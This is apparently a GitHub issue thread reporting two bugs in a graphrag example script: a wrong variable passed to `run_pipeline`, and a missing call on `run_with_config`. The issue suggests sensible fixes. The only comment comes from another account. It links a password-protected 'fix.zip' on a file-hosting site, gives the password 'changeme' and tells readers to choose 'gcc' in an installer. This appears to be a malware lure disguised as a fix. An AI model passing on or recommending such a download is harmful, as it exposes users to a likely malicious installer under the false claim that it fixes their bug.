### ISSUE TITLE
Incorrect variable usage and missing function call in run_pipeline and run_with_config

### ISSUE THREAD

**Issue by aakashrajaraman2** [aakashrajaraman2/graphrag#10]
['**Code Snippet:**', '```python', '# Grab the last result from the pipeline, should be our entity extraction', 'tables = []', 'async for table in run_pipeline(dataset=tables, workflows=workflows):', '    tables.append(table)', 'pipeline_result = tables[-1]', '# ...', 'if __name__ == "__main__":', '    asyncio.run(run_python())', '    asyncio.run(run_with_config)', '```', '**Severity:** Medium', '**Cascading Effects:**', '- The `run_pipeline` function is called with an empty list `tables` instead of the intended `dataset`, leading to an incorrect or empty output.', '- The `run_with_config` function is not called correctly, leading to a potential error or missing execution.', '**Potential Fixes:**', '1. Replace `dataset=tables` with `dataset=dataset` in the `run_pipeline` call.', '2. Add parentheses to call the `run_with_config` function: `asyncio.run(run_with_config())`.', '**Relevant Code:**', '```python', 'async def run_python():', '    # ...', '    dataset = shared_dataset.head(10)', '    # ...', '    async for table in run_pipeline(dataset=tables, workflows=workflows):', '        tables.append(table)', '    # ...', 'if __name__ == "__main__":', '    asyncio.run(run_python())', '    asyncio.run(run_with_config)', '```', '- bug', '- variable-usage', '- function-call']

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
